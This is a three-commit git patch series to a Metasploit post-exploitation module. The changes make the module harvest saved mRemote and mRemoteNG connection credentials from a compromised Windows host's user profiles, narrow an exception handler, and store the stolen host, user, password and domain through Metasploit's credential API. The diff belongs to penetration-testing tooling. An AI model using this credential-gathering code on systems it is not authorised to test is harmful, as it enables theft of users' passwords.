From bf3bb63e4ac498d1958cf670d9fddc9263b79e65 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Thu, 29 May 2014 15:43:02 -0500 Subject: [PATCH 1/3] fix mremote to work on mremoteNG fixed the mremote credential post module to work against the newer mRemoteNG --- modules/post/windows/gather/credentials/mremote.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/post/windows/gather/credentials/mremote.rb b/modules/post/windows/gather/credentials/mremote.rb index bf73a554b8..508770168b 100644 --- a/modules/post/windows/gather/credentials/mremote.rb +++ b/modules/post/windows/gather/credentials/mremote.rb @@ -41,8 +41,10 @@ class Metasploit3 < Msf::Post grab_user_profiles().each do |user| next if user['LocalAppData'] == nil - tmpath= user['LocalAppData'] + '\\Felix_Deimel\\mRemote\\confCons.xml' + tmpath = user['LocalAppData'] + '\\Felix_Deimel\\mRemote\\confCons.xml' + ng_path = user['LocalAppData'] + '\\..\\Roaming\\mRemoteNG\\confCons.xml' get_xml(tmpath) + get_xml(ng_path) end end From a1131092b7c28887c2bff7863986f5a6eb8d7e78 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Thu, 29 May 2014 16:05:16 -0500 Subject: [PATCH 2/3] fix open rescue rescuing all exceptions bad bad past dave bad --- modules/post/windows/gather/credentials/mremote.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/gather/credentials/mremote.rb b/modules/post/windows/gather/credentials/mremote.rb index 508770168b..bdbc0f78b6 100644 --- a/modules/post/windows/gather/credentials/mremote.rb +++ b/modules/post/windows/gather/credentials/mremote.rb @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Post end parse_xml(condata) print_status("Finished processing #{path}") - rescue + rescue Rex::Post::Meterpreter::RequestError print_status("The file #{path} either could not be read or does not exist") end From e012d55d736ad85230e5a40749a08e8df14bb428 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Thu, 29 May 2014 16:27:41 -0500 Subject: [PATCH 3/3] refactor mremote mremote post module now refactored to use new metasploit credentials --- .../windows/gather/credentials/mremote.rb | 46 +++++++++++++++---- 1 file changed, 38 insertions(+), 8 deletions(-) diff --git a/modules/post/windows/gather/credentials/mremote.rb b/modules/post/windows/gather/credentials/mremote.rb index bdbc0f78b6..1c55f8912e 100644 --- a/modules/post/windows/gather/credentials/mremote.rb +++ b/modules/post/windows/gather/credentials/mremote.rb @@ -86,14 +86,44 @@ class Metasploit3 < Msf::Post else source_id = nil end - report_auth_info( - :host => host, - :port => port, - :sname => proto, - :source_id => source_id, - :source_type => "exploit", - :user => user, - :pass => pass) + + service_data = { + address: host, + port: port, + service_name: proto, + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + origin_type: :session, + session_id: session_db_id, + post_reference_name: self.refname, + private_type: :password, + private_data: pass, + username: user + } + + unless domain.blank? + credential_data[:realm_key] = Metasploit::Credential::Realm::Key::ACTIVE_DIRECTORY_DOMAIN + credential_data[:realm_value] = domain + end + + credential_data.merge!(service_data) + + # Create the Metasploit::Credential::Core object + credential_core = create_credential(credential_data) + + # Assemble the options hash for creating the Metasploit::Credential::Login object + login_data ={ + core: credential_core, + status: Metasploit::Credential::Login::Status::UNTRIED + } + + # Merge in the service data and create our Login + login_data.merge!(service_data) + login = create_credential_login(login_data) + end end